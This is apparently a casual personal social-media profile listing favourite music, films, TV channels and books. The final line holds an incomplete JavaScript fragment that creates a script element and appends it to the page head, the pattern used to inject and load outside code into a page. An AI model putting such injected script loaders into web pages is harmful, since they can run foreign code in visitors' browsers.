music, movies & nature
pretty open. not stuck up or shallow enough to just hang with certain people or certain "label'' that's stupid. as long as ya don't whine, bitch, coplain, or cause drama you're already cool with me. too laid back and care-free for that shit.
ROCK Classic rock; Pink Floyd, Led Zep, Doors, Dead, Stones, Beatles. etc... Punk alternative metal
comedies, old low budget horrors, and freaky twisted horrors, Bruce Lee and other Kung Fu movies
cartoons, comedies, history channel, discovery channel and other similar stations
yeah they're good to even out the coffee table. LOL don't read alot but i like educational books i like to learn new stuff.
hope to find one someday .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);" ..